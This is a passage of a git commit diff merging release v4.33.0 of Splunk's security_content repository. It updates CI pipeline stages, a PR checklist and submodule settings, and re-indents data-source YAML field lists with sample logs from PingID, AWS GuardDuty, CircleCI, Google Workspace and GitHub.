Merge branch 'release_v4.33.0' into 'develop'

Release Branch v4.33.0

See merge request threat-research/security_content!1520
This commit is contained in:
Bhavin Patel
2024-06-05 21:05:06 +00:00
474 changed files with 4538 additions and 217651 deletions
+7 -6
View File
@@ -8,19 +8,20 @@ variables:
SKIP_DOWNSTREAM_TESTING:
value: "False"
description: "If true, downstream testing will be suppressed (useful for debugging or forcing a release in an emergency)."
ENABLE_INTEGRATION_TESTING:
value: "True"
description: "Flag indicating that integration testing should be performed. Defaults to True, may be suppressed in some workflows."
stages:
- validate
- generate
- test
- build
- app_inspect
- test
- release
include:
- local: "pipeline/.validate.yml"
- local: "pipeline/.generate.yml"
- local: "pipeline/.build.yml"
- local: "pipeline/.app-inspect.yml"
- local: "pipeline/.test.yml"
- local: "pipeline/.app_inspect.yml"
- local: "pipeline/.release.yml"
- local: "pipeline/.post.yml"
@@ -31,4 +31,8 @@
*
* Are there any detections that we're promoting from validation to production in this package? If we're adding new any detections to help understand the over-firing detections, please indicate those as well
*
*
#### Checklist
* [ ] Trigger a full-package ESCU integration test and confirm there are no regressions (see manually triggered jobs on the most recent push pipeline)
* [ ] Trigger a SSA/BA integration test and confirm there are no regressions (see manually triggered jobs on the most recent push pipeline)
+6 -4
View File
@@ -1,4 +1,6 @@
[submodule "contentctl"]
path = contentctl
url = https://github.com/splunk/contentctl.git
ignore = all
# Removing submodule and using pip to install contentctl. Keeping this as a comment to help using submodules for local development
# [submodule "contentctl"]
# path = contentctl
# url = https://github.com/splunk/contentctl.git
# ignore = all
Submodule contentctl deleted from a169fee8d7
+29 -29
View File
@@ -3,36 +3,36 @@ id: 17890675-61c1-40bd-a88e-6a8e9e246b43
author: Patrick Bareiss, Splunk
source: XmlWinEventLog:Security
sourcetype: XmlWinEventLog
separator: null
supported_TA: {}
event_names: []
fields:
- _time
- actors{}.name
- actors{}.type
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- extracted_source
- host
- id
- index
- linecount
- punct
- recorded
- resources{}.ipaddress
- resources{}.websession
- result.message
- result.status
- source
- sourcetype
- splunk_server
- timeendpos
- timestartpos
example_log: '{"source":"PINGID","id":"b2eb1fef-651b-11ee-b38b-0ac7a554ed19","recorded":"2023-10-05T14:10:53.538Z","actors":[{"type":"user","name":"victim_user"}],"resources":[{"ipaddress":"174.235.80.142","websession":"webs_ijkF-T_bAC_G3w2TfvdpAEQeC545KFlqVFOsolCXdjo"}],"result":{"status":"SUCCESS","message":"Device
- _time
- actors{}.name
- actors{}.type
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- extracted_source
- host
- id
- index
- linecount
- punct
- recorded
- resources{}.ipaddress
- resources{}.websession
- result.message
- result.status
- source
- sourcetype
- splunk_server
- timeendpos
- timestartpos
example_log:
'{"source":"PINGID","id":"b2eb1fef-651b-11ee-b38b-0ac7a554ed19","recorded":"2023-10-05T14:10:53.538Z","actors":[{"type":"user","name":"victim_user"}],"resources":[{"ipaddress":"174.235.80.142","websession":"webs_ijkF-T_bAC_G3w2TfvdpAEQeC545KFlqVFOsolCXdjo"}],"result":{"status":"SUCCESS","message":"Device
Paired SMS \"Mobile 1\""}}'
+26 -26
View File
@@ -3,32 +3,32 @@ id: d8a2c791-460b-4756-a8e5-ecade77b21e3
author: Patrick Bareiss, Splunk
source: splunkd_ui_access.log
sourcetype: splunkd_ui_access
separator: null
supported_TA: {}
event_names: []
fields:
- _time
- action
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest
- host
- index
- info
- linecount
- punct
- source
- sourcetype
- splunk_server
- timeendpos
- timestamp
- timestartpos
- user
example_log: 'Audit:[timestamp=01-25-2023 22:08:54.818, user=admin, action=search,
info=granted REST: /search/jobs/rt_1674684525.24/events]'
- _time
- action
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest
- host
- index
- info
- linecount
- punct
- source
- sourcetype
- splunk_server
- timeendpos
- timestamp
- timestartpos
- user
example_log:
"Audit:[timestamp=01-25-2023 22:08:54.818, user=admin, action=search,
info=granted REST: /search/jobs/rt_1674684525.24/events]"
+105 -105
View File
@@ -3,117 +3,117 @@ id: b02bfbf3-294f-478e-99a1-e24b8c692d7e
author: Patrick Bareiss, Splunk
source: aws_securityhub_finding
sourcetype: aws:securityhub:finding
separator: null
supported_TA:
name: Splunk Add-on for Amazon Web Services (AWS)
version: 7.4.1
url: https://splunkbase.splunk.com/app/1876
event_names: []
fields:
- _time
- AwsAccountId
- CreatedAt
- Description
- FirstObservedAt
- GeneratorId
- Id
- LastObservedAt
- ProductArn
- ProductFields.aws/guardduty/service/action/actionType
- ProductFields.aws/guardduty/service/action/awsApiCallAction/affectedResources/AWS::S3::Bucket
- ProductFields.aws/guardduty/service/action/awsApiCallAction/api
- ProductFields.aws/guardduty/service/action/awsApiCallAction/callerType
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/city/cityName
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/country/countryName
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/geoLocation/lat
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/geoLocation/lon
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/ipAddressV4
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asn
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asnOrg
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/isp
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/org
- ProductFields.aws/guardduty/service/action/awsApiCallAction/serviceName
- ProductFields.aws/guardduty/service/additionalInfo/sample
- ProductFields.aws/guardduty/service/additionalInfo/unusual/hoursOfDay.0_
- ProductFields.aws/guardduty/service/additionalInfo/unusual/userNames.0_
- ProductFields.aws/guardduty/service/archived
- ProductFields.aws/guardduty/service/count
- ProductFields.aws/guardduty/service/detectorId
- ProductFields.aws/guardduty/service/eventFirstSeen
- ProductFields.aws/guardduty/service/eventLastSeen
- ProductFields.aws/guardduty/service/resourceRole
- ProductFields.aws/guardduty/service/serviceName
- ProductFields.aws/securityhub/CompanyName
- ProductFields.aws/securityhub/FindingId
- ProductFields.aws/securityhub/ProductName
- RecordState
- Resources{}.Details.AwsEc2Instance.IamInstanceProfileArn
- Resources{}.Details.AwsEc2Instance.ImageId
- Resources{}.Details.AwsEc2Instance.IpV4Addresses{}
- Resources{}.Details.AwsEc2Instance.LaunchedAt
- Resources{}.Details.AwsEc2Instance.SubnetId
- Resources{}.Details.AwsEc2Instance.Type
- Resources{}.Details.AwsEc2Instance.VpcId
- Resources{}.Details.AwsIamAccessKey.PrincipalId
- Resources{}.Details.AwsIamAccessKey.PrincipalName
- Resources{}.Details.AwsIamAccessKey.PrincipalType
- Resources{}.Details.AwsS3Bucket.CreatedAt
- Resources{}.Details.AwsS3Bucket.OwnerId
- Resources{}.Details.AwsS3Bucket.ServerSideEncryptionConfiguration.Rules{}.ApplyServerSideEncryptionByDefault.KMSMasterKeyID
- Resources{}.Details.AwsS3Bucket.ServerSideEncryptionConfiguration.Rules{}.ApplyServerSideEncryptionByDefault.SSEAlgorithm
- Resources{}.Id
- Resources{}.Partition
- Resources{}.Region
- Resources{}.Tags.GeneratedFindingInstaceTag1
- Resources{}.Tags.GeneratedFindingInstaceTag2
- Resources{}.Tags.GeneratedFindingInstaceTag3
- Resources{}.Tags.GeneratedFindingInstaceTag4
- Resources{}.Tags.GeneratedFindingInstaceTag5
- Resources{}.Tags.GeneratedFindingInstaceTag6
- Resources{}.Tags.GeneratedFindingInstaceTag7
- Resources{}.Tags.GeneratedFindingInstaceTag8
- Resources{}.Tags.GeneratedFindingInstaceTag9
- Resources{}.Tags.foo
- Resources{}.Type
- SchemaVersion
- Severity.Label
- Severity.Normalized
- Severity.Product
- SourceUrl
- Title
- Types{}
- UpdatedAt
- Workflow.Status
- WorkflowState
- accesskey_extract
- app
- body
- description
- dest
- dest_type
- eventtype
- host
- id
- index
- instance_extract
- linecount
- punct
- s3bucket_extract
- severity
- severity_id
- signature
- signature_id
- source
- sourcetype
- splunk_server
- subject
- tag
- tag::eventtype
- timestamp
- type
- vendor_account
- vendor_region
example_log: '{"ProductArn":"arn:aws:securityhub:us-east-1::product/aws/guardduty","Types":["Software
- _time
- AwsAccountId
- CreatedAt
- Description
- FirstObservedAt
- GeneratorId
- Id
- LastObservedAt
- ProductArn
- ProductFields.aws/guardduty/service/action/actionType
- ProductFields.aws/guardduty/service/action/awsApiCallAction/affectedResources/AWS::S3::Bucket
- ProductFields.aws/guardduty/service/action/awsApiCallAction/api
- ProductFields.aws/guardduty/service/action/awsApiCallAction/callerType
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/city/cityName
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/country/countryName
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/geoLocation/lat
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/geoLocation/lon
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/ipAddressV4
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asn
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asnOrg
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/isp
- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/org
- ProductFields.aws/guardduty/service/action/awsApiCallAction/serviceName
- ProductFields.aws/guardduty/service/additionalInfo/sample
- ProductFields.aws/guardduty/service/additionalInfo/unusual/hoursOfDay.0_
- ProductFields.aws/guardduty/service/additionalInfo/unusual/userNames.0_
- ProductFields.aws/guardduty/service/archived
- ProductFields.aws/guardduty/service/count
- ProductFields.aws/guardduty/service/detectorId
- ProductFields.aws/guardduty/service/eventFirstSeen
- ProductFields.aws/guardduty/service/eventLastSeen
- ProductFields.aws/guardduty/service/resourceRole
- ProductFields.aws/guardduty/service/serviceName
- ProductFields.aws/securityhub/CompanyName
- ProductFields.aws/securityhub/FindingId
- ProductFields.aws/securityhub/ProductName
- RecordState
- Resources{}.Details.AwsEc2Instance.IamInstanceProfileArn
- Resources{}.Details.AwsEc2Instance.ImageId
- Resources{}.Details.AwsEc2Instance.IpV4Addresses{}
- Resources{}.Details.AwsEc2Instance.LaunchedAt
- Resources{}.Details.AwsEc2Instance.SubnetId
- Resources{}.Details.AwsEc2Instance.Type
- Resources{}.Details.AwsEc2Instance.VpcId
- Resources{}.Details.AwsIamAccessKey.PrincipalId
- Resources{}.Details.AwsIamAccessKey.PrincipalName
- Resources{}.Details.AwsIamAccessKey.PrincipalType
- Resources{}.Details.AwsS3Bucket.CreatedAt
- Resources{}.Details.AwsS3Bucket.OwnerId
- Resources{}.Details.AwsS3Bucket.ServerSideEncryptionConfiguration.Rules{}.ApplyServerSideEncryptionByDefault.KMSMasterKeyID
- Resources{}.Details.AwsS3Bucket.ServerSideEncryptionConfiguration.Rules{}.ApplyServerSideEncryptionByDefault.SSEAlgorithm
- Resources{}.Id
- Resources{}.Partition
- Resources{}.Region
- Resources{}.Tags.GeneratedFindingInstaceTag1
- Resources{}.Tags.GeneratedFindingInstaceTag2
- Resources{}.Tags.GeneratedFindingInstaceTag3
- Resources{}.Tags.GeneratedFindingInstaceTag4
- Resources{}.Tags.GeneratedFindingInstaceTag5
- Resources{}.Tags.GeneratedFindingInstaceTag6
- Resources{}.Tags.GeneratedFindingInstaceTag7
- Resources{}.Tags.GeneratedFindingInstaceTag8
- Resources{}.Tags.GeneratedFindingInstaceTag9
- Resources{}.Tags.foo
- Resources{}.Type
- SchemaVersion
- Severity.Label
- Severity.Normalized
- Severity.Product
- SourceUrl
- Title
- Types{}
- UpdatedAt
- Workflow.Status
- WorkflowState
- accesskey_extract
- app
- body
- description
- dest
- dest_type
- eventtype
- host
- id
- index
- instance_extract
- linecount
- punct
- s3bucket_extract
- severity
- severity_id
- signature
- signature_id
- source
- sourcetype
- splunk_server
- subject
- tag
- tag::eventtype
- timestamp
- type
- vendor_account
- vendor_region
example_log:
'{"ProductArn":"arn:aws:securityhub:us-east-1::product/aws/guardduty","Types":["Software
and Configuration Checks/Exfiltration:S3.ObjectRead.Unusual"],"SourceUrl":"https://us-east-1.console.aws.amazon.com/guardduty/home?region=us-east-1#/findings?macros=current&fId=6aba6b696aea10606e8b336f68d98819","Description":"Principal
GeneratedFindingUserName read objects from S3 bucket GeneratedFindingS3Bucket in
an unusual way.","SchemaVersion":"2018-10-08","GeneratorId":"arn:aws:guardduty:us-east-1:802684071507:detector/48ba636359b884eb132865311fdeb317","FirstObservedAt":"2020-09-28T22:26:15.636Z","CreatedAt":"2020-09-28T22:26:15.636Z","RecordState":"ACTIVE","Title":"Unusual
+54 -54
View File
@@ -3,66 +3,66 @@ id: 34ad06fc-a296-4ab5-8315-2f07714948e3
author: Patrick Bareiss, Splunk
source: circleci
sourcetype: circleci
separator: null
supported_TA:
name: App for CircleCI
version: 0.1.1
url: https://splunkbase.splunk.com/app/5162
event_names: []
fields:
- _time
- author_name
- avatar_url
- branch
- build_num
- build_time_millis
- build_url
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- eventtype
- fail_reason
- host
- index
- job_name
- job_time
- linecount
- owners{}
- project_slug
- punct
- queued_time
- reponame
- source
- sourcetype
- splunk_server
- start_time
- status
- stop_time
- tag
- tag::eventtype
- timedout
- timeendpos
- timestartpos
- username
- vcs.commit_time
- vcs.committer_name
- vcs.revision
- vcs.subject
- vcs.tag
- vcs.type
- vcs.url
- workflows.job_id
- workflows.job_name
- workflows.upstream_job_ids{}
- workflows.workflow_id
- workflows.workflow_name
- workflows.workspace_id
example_log: '{"job_time": "2021-09-02T08:13:34.273Z", "stop_time": "2021-09-02T08:13:34.273Z",
- _time
- author_name
- avatar_url
- branch
- build_num
- build_time_millis
- build_url
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- eventtype
- fail_reason
- host
- index
- job_name
- job_time
- linecount
- owners{}
- project_slug
- punct
- queued_time
- reponame
- source
- sourcetype
- splunk_server
- start_time
- status
- stop_time
- tag
- tag::eventtype
- timedout
- timeendpos
- timestartpos
- username
- vcs.commit_time
- vcs.committer_name
- vcs.revision
- vcs.subject
- vcs.tag
- vcs.type
- vcs.url
- workflows.job_id
- workflows.job_name
- workflows.upstream_job_ids{}
- workflows.workflow_id
- workflows.workflow_name
- workflows.workspace_id
example_log:
'{"job_time": "2021-09-02T08:13:34.273Z", "stop_time": "2021-09-02T08:13:34.273Z",
"start_time": "2021-09-02T08:10:15.829Z", "queued_time": "2021-09-02T08:10:12.764Z",
"job_name": "Unknown", "reponame": "devsecops_poc", "build_num": 94, "build_url":
"https://circleci.com/gh/splunk/devsecops_poc/94", "branch": "main", "status": "success",
+33 -33
View File
@@ -3,45 +3,45 @@ id: 5f79120f-a235-4468-bd0d-55203758ac22
author: Patrick Bareiss, Splunk
source: http:gsuite
sourcetype: gsuite:drive:json
separator: null
supported_TA:
name: Splunk Add-on for Google Workspace
version: 2.6.3
url: https://splunkbase.splunk.com/app/5556
event_names: []
fields:
- _time
- email
- host
- index
- ip_address
- linecount
- name
- parameters.actor_is_collaborator_account
- parameters.billable
- parameters.doc_id
- parameters.doc_title
- parameters.doc_type
- parameters.is_encrypted
- parameters.new_value{}
- parameters.old_value{}
- parameters.old_visibility
- parameters.originating_app_id
- parameters.owner
- parameters.owner_is_shared_drive
- parameters.owner_is_team_drive
- parameters.primary_event
- parameters.target_user
- parameters.visibility
- parameters.visibility_change
- punct
- source
- sourcetype
- splunk_server
- timestamp
- type
- unique_id
example_log: '{"type": "acl_change", "name": "change_user_access", "parameters": {"primary_event":
- _time
- email
- host
- index
- ip_address
- linecount
- name
- parameters.actor_is_collaborator_account
- parameters.billable
- parameters.doc_id
- parameters.doc_title
- parameters.doc_type
- parameters.is_encrypted
- parameters.new_value{}
- parameters.old_value{}
- parameters.old_visibility
- parameters.originating_app_id
- parameters.owner
- parameters.owner_is_shared_drive
- parameters.owner_is_team_drive
- parameters.primary_event
- parameters.target_user
- parameters.visibility
- parameters.visibility_change
- punct
- source
- sourcetype
- splunk_server
- timestamp
- type
- unique_id
example_log:
'{"type": "acl_change", "name": "change_user_access", "parameters": {"primary_event":
true, "billable": true, "visibility_change": "none", "target_user": "alberto@internal_test_email.com",
"old_value": ["none"], "new_value": ["can_edit"], "old_visibility": "private", "doc_id":
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "doc_type": "spreadsheet", "is_encrypted":
+72 -72
View File
@@ -3,84 +3,84 @@ id: 706c3978-41de-406b-b6e0-75bd01e12a5d
author: Patrick Bareiss, Splunk
source: http:gsuite
sourcetype: gsuite:gmail:bigquery
separator: null
supported_TA:
name: Splunk Add-on for Google Workspace
version: 2.6.3
url: https://splunkbase.splunk.com/app/5556
event_names: []
fields:
- _time
- action_type
- attachment{}.file_extension_type
- attachment{}.malware_family
- attachment{}.sha256
- connection_info.authenticated_domain{}.name
- connection_info.authenticated_domain{}.type
- connection_info.client_host_zone
- connection_info.client_ip
- connection_info.dkim_pass
- connection_info.dmarc_pass
- connection_info.dmarc_published_domain
- connection_info.ip_geo_city
- connection_info.ip_geo_country
- connection_info.is_internal
- connection_info.is_intra_domain
- connection_info.smtp_in_connect_ip
- connection_info.smtp_out_connect_ip
- connection_info.smtp_out_remote_host
- connection_info.smtp_reply_code
- connection_info.smtp_response_reason
- connection_info.smtp_tls_cipher
- connection_info.smtp_tls_state
- connection_info.smtp_tls_version
- connection_info.smtp_user_agent_ip
- connection_info.spf_pass
- connection_info.tls_required_but_unavailable
- description
- destination{}.address
- destination{}.rcpt_response
- destination{}.selector
- destination{}.service
- destination{}.smime_decryption_success
- destination{}.smime_extraction_success
- destination{}.smime_parsing_success
- destination{}.smime_signature_verification_success
- eventtype
- flattened_destinations
- flattened_triggered_rule_info
- host
- index
- is_policy_check_for_sender
- is_spam
- linecount
- message_set{}.type
- num_message_attachments
- payload_size
- punct
- rfc2822_message_id
- smime_content_type
- smime_encrypt_message
- smime_extraction_success
- smime_packaging_success
- smime_sign_message
- smtp_relay_error
- source
- source.address
- source.from_header_address
- source.from_header_displayname
- source.selector
- source.service
- sourcetype
- spam_info
- splunk_server
- structured_policy_log_info
- subject
- tag
- tag::eventtype
- timestamp
- upload_error_category
example_log: '{"action_type": 10, "rfc2822_message_id": "<CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC@mail.gmail.com>",
- _time
- action_type
- attachment{}.file_extension_type
- attachment{}.malware_family
- attachment{}.sha256
- connection_info.authenticated_domain{}.name
- connection_info.authenticated_domain{}.type
- connection_info.client_host_zone
- connection_info.client_ip
- connection_info.dkim_pass
- connection_info.dmarc_pass
- connection_info.dmarc_published_domain
- connection_info.ip_geo_city
- connection_info.ip_geo_country
- connection_info.is_internal
- connection_info.is_intra_domain
- connection_info.smtp_in_connect_ip
- connection_info.smtp_out_connect_ip
- connection_info.smtp_out_remote_host
- connection_info.smtp_reply_code
- connection_info.smtp_response_reason
- connection_info.smtp_tls_cipher
- connection_info.smtp_tls_state
- connection_info.smtp_tls_version
- connection_info.smtp_user_agent_ip
- connection_info.spf_pass
- connection_info.tls_required_but_unavailable
- description
- destination{}.address
- destination{}.rcpt_response
- destination{}.selector
- destination{}.service
- destination{}.smime_decryption_success
- destination{}.smime_extraction_success
- destination{}.smime_parsing_success
- destination{}.smime_signature_verification_success
- eventtype
- flattened_destinations
- flattened_triggered_rule_info
- host
- index
- is_policy_check_for_sender
- is_spam
- linecount
- message_set{}.type
- num_message_attachments
- payload_size
- punct
- rfc2822_message_id
- smime_content_type
- smime_encrypt_message
- smime_extraction_success
- smime_packaging_success
- smime_sign_message
- smtp_relay_error
- source
- source.address
- source.from_header_address
- source.from_header_displayname
- source.selector
- source.service
- sourcetype
- spam_info
- splunk_server
- structured_policy_log_info
- subject
- tag
- tag::eventtype
- timestamp
- upload_error_category
example_log:
'{"action_type": 10, "rfc2822_message_id": "<CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC@mail.gmail.com>",
"subject": "New Order DHL0000001 - Dummy email for Detection Development", "payload_size":
6733, "source": {"address": "john@external_test_email.com", "service": "gmail-for-work",
"selector": "policy", "from_header_address": "john@external_test_email.com", "from_header_displayname":
+191 -191
View File
@@ -3,203 +3,203 @@ id: 88aa4632-3c3e-43f6-a00a-998d71f558e3
author: Patrick Bareiss, Splunk
source: github
sourcetype: aws:firehose:json
separator: null
supported_TA:
name: Splunk Add-on for Github
version: 2.2.1
url: https://splunkbase.splunk.com/app/6254
event_names: []
fields:
- _time
- action
- host
- index
- linecount
- meta
- punct
- source
- sourcetype
- splunk_server
- timestamp
- workflow_run.actor.avatar_url
- workflow_run.actor.events_url
- workflow_run.actor.followers_url
- workflow_run.actor.following_url
- workflow_run.actor.gists_url
- workflow_run.actor.gravatar_id
- workflow_run.actor.html_url
- workflow_run.actor.id
- workflow_run.actor.login
- workflow_run.actor.node_id
- workflow_run.actor.organizations_url
- workflow_run.actor.received_events_url
- workflow_run.actor.repos_url
- workflow_run.actor.site_admin
- workflow_run.actor.starred_url
- workflow_run.actor.subscriptions_url
- workflow_run.actor.type
- workflow_run.actor.url
- workflow_run.artifacts_url
- workflow_run.cancel_url
- workflow_run.check_suite_id
- workflow_run.check_suite_node_id
- workflow_run.check_suite_url
- workflow_run.conclusion
- workflow_run.created_at
- workflow_run.event
- workflow_run.head_branch
- workflow_run.head_commit.author.email
- workflow_run.head_commit.author.name
- workflow_run.head_commit.committer.email
- workflow_run.head_commit.committer.name
- workflow_run.head_commit.id
- workflow_run.head_commit.message
- workflow_run.head_commit.timestamp
- workflow_run.head_commit.tree_id
- workflow_run.head_repository.collaborators_url
- workflow_run.head_repository.description
- workflow_run.head_repository.fork
- workflow_run.head_repository.forks_url
- workflow_run.head_repository.full_name
- workflow_run.head_repository.hooks_url
- workflow_run.head_repository.html_url
- workflow_run.head_repository.id
- workflow_run.head_repository.keys_url
- workflow_run.head_repository.name
- workflow_run.head_repository.node_id
- workflow_run.head_repository.owner.avatar_url
- workflow_run.head_repository.owner.events_url
- workflow_run.head_repository.owner.followers_url
- workflow_run.head_repository.owner.following_url
- workflow_run.head_repository.owner.gists_url
- workflow_run.head_repository.owner.gravatar_id
- workflow_run.head_repository.owner.html_url
- workflow_run.head_repository.owner.id
- workflow_run.head_repository.owner.login
- workflow_run.head_repository.owner.node_id
- workflow_run.head_repository.owner.organizations_url
- workflow_run.head_repository.owner.received_events_url
- workflow_run.head_repository.owner.repos_url
- workflow_run.head_repository.owner.site_admin
- workflow_run.head_repository.owner.starred_url
- workflow_run.head_repository.owner.subscriptions_url
- workflow_run.head_repository.owner.type
- workflow_run.head_repository.owner.url
- workflow_run.head_repository.private
- workflow_run.head_repository.teams_url
- workflow_run.head_repository.url
- workflow_run.head_sha
- workflow_run.html_url
- workflow_run.id
- workflow_run.jobs_url
- workflow_run.logs_url
- workflow_run.name
- workflow_run.node_id
- workflow_run.previous_attempt_url
- workflow_run.pull_requests{}.base.ref
- workflow_run.pull_requests{}.base.repo.id
- workflow_run.pull_requests{}.base.repo.name
- workflow_run.pull_requests{}.base.repo.url
- workflow_run.pull_requests{}.base.sha
- workflow_run.pull_requests{}.head.ref
- workflow_run.pull_requests{}.head.repo.id
- workflow_run.pull_requests{}.head.repo.name
- workflow_run.pull_requests{}.head.repo.url
- workflow_run.pull_requests{}.head.sha
- workflow_run.pull_requests{}.id
- workflow_run.pull_requests{}.number
- workflow_run.pull_requests{}.url
- workflow_run.repository.archive_url
- workflow_run.repository.assignees_url
- workflow_run.repository.blobs_url
- workflow_run.repository.branches_url
- workflow_run.repository.collaborators_url
- workflow_run.repository.comments_url
- workflow_run.repository.commits_url
- workflow_run.repository.compare_url
- workflow_run.repository.contents_url
- workflow_run.repository.contributors_url
- workflow_run.repository.deployments_url
- workflow_run.repository.description
- workflow_run.repository.downloads_url
- workflow_run.repository.events_url
- workflow_run.repository.fork
- workflow_run.repository.forks_url
- workflow_run.repository.full_name
- workflow_run.repository.git_commits_url
- workflow_run.repository.git_refs_url
- workflow_run.repository.git_tags_url
- workflow_run.repository.hooks_url
- workflow_run.repository.html_url
- workflow_run.repository.id
- workflow_run.repository.issue_comment_url
- workflow_run.repository.issue_events_url
- workflow_run.repository.issues_url
- workflow_run.repository.keys_url
- workflow_run.repository.labels_url
- workflow_run.repository.languages_url
- workflow_run.repository.merges_url
- workflow_run.repository.milestones_url
- workflow_run.repository.name
- workflow_run.repository.node_id
- workflow_run.repository.notifications_url
- workflow_run.repository.owner.avatar_url
- workflow_run.repository.owner.events_url
- workflow_run.repository.owner.followers_url
- workflow_run.repository.owner.following_url
- workflow_run.repository.owner.gists_url
- workflow_run.repository.owner.gravatar_id
- workflow_run.repository.owner.html_url
- workflow_run.repository.owner.id
- workflow_run.repository.owner.login
- workflow_run.repository.owner.node_id
- workflow_run.repository.owner.organizations_url
- workflow_run.repository.owner.received_events_url
- workflow_run.repository.owner.repos_url
- workflow_run.repository.owner.site_admin
- workflow_run.repository.owner.starred_url
- workflow_run.repository.owner.subscriptions_url
- workflow_run.repository.owner.type
- workflow_run.repository.owner.url
- workflow_run.repository.private
- workflow_run.repository.pulls_url
- workflow_run.repository.releases_url
- workflow_run.repository.stargazers_url
- workflow_run.repository.statuses_url
- workflow_run.repository.subscribers_url
- workflow_run.repository.subscription_url
- workflow_run.repository.tags_url
- workflow_run.repository.teams_url
- workflow_run.repository.trees_url
- workflow_run.repository.url
- workflow_run.rerun_url
- workflow_run.run_attempt
- workflow_run.run_number
- workflow_run.run_started_at
- workflow_run.status
- workflow_run.triggering_actor.avatar_url
- workflow_run.triggering_actor.events_url
- workflow_run.triggering_actor.followers_url
- workflow_run.triggering_actor.following_url
- workflow_run.triggering_actor.gists_url
- workflow_run.triggering_actor.gravatar_id
- workflow_run.triggering_actor.html_url
- workflow_run.triggering_actor.id
- workflow_run.triggering_actor.login
- workflow_run.triggering_actor.node_id
- workflow_run.triggering_actor.organizations_url
- workflow_run.triggering_actor.received_events_url
- workflow_run.triggering_actor.repos_url
- workflow_run.triggering_actor.site_admin
- workflow_run.triggering_actor.starred_url
- workflow_run.triggering_actor.subscriptions_url
- workflow_run.triggering_actor.type
- workflow_run.triggering_actor.url
- workflow_run.updated_at
- workflow_run.url
- workflow_run.workflow_id
- workflow_run.workflow_url
example_log: '{"action":"requested","workflow_run":{"id":2088708615,"name":"auto-update","node_id":"WFR_kwLOCa00Ec58fyoH","head_branch":"mac_os_detections","head_sha":"4049334910ea3d52a917ca35aed66d11c80ed966","run_number":9504,"event":"push","status":"queued","conclusion":null,"workflow_id":4692335,"check_suite_id":5918781611,"check_suite_node_id":"CS_kwDOCa00Ec8AAAABYMlwqw","url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615","html_url":"https://github.com/splunk/security_content/actions/runs/2088708615","pull_requests":[{"url":"https://api.github.com/repos/splunk/security_content/pulls/2131","id":893091277,"number":2131,"head":{"ref":"mac_os_detections","sha":"4049334910ea3d52a917ca35aed66d11c80ed966","repo":{"id":162346001,"url":"https://api.github.com/repos/splunk/security_content","name":"security_content"}},"base":{"ref":"develop","sha":"a7d3d1dc57f9bf36fe22e470bcf518fcc2c89283","repo":{"id":162346001,"url":"https://api.github.com/repos/splunk/security_content","name":"security_content"}}}],"created_at":"2022-04-04T08:43:15Z","updated_at":"2022-04-04T08:43:15Z","actor":{"login":"jsmith","id":8362376,"node_id":"MDQ6VXNlcjgzNjIzNzY=","avatar_url":"https://avatars.githubusercontent.com/u/8362376?v=4","gravatar_id":"","url":"https://api.github.com/users/jsmith","html_url":"https://github.com/jsmith","followers_url":"https://api.github.com/users/jsmith/followers","following_url":"https://api.github.com/users/jsmith/following{/other_user}","gists_url":"https://api.github.com/users/jsmith/gists{/gist_id}","starred_url":"https://api.github.com/users/jsmith/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/jsmith/subscriptions","organizations_url":"https://api.github.com/users/jsmith/orgs","repos_url":"https://api.github.com/users/jsmith/repos","events_url":"https://api.github.com/users/jsmith/events{/privacy}","received_events_url":"https://api.github.com/users/jsmith/received_events","type":"User","site_admin":false},"run_attempt":1,"run_started_at":"2022-04-04T08:43:15Z","triggering_actor":{"login":"jsmith","id":8362376,"node_id":"MDQ6VXNlcjgzNjIzNzY=","avatar_url":"https://avatars.githubusercontent.com/u/8362376?v=4","gravatar_id":"","url":"https://api.github.com/users/jsmith","html_url":"https://github.com/jsmith","followers_url":"https://api.github.com/users/jsmith/followers","following_url":"https://api.github.com/users/jsmith/following{/other_user}","gists_url":"https://api.github.com/users/jsmith/gists{/gist_id}","starred_url":"https://api.github.com/users/jsmith/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/jsmith/subscriptions","organizations_url":"https://api.github.com/users/jsmith/orgs","repos_url":"https://api.github.com/users/jsmith/repos","events_url":"https://api.github.com/users/jsmith/events{/privacy}","received_events_url":"https://api.github.com/users/jsmith/received_events","type":"User","site_admin":false},"jobs_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/jobs","logs_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/logs","check_suite_url":"https://api.github.com/repos/splunk/security_content/check-suites/5918781611","artifacts_url":"https://api.github.com/repos/splunk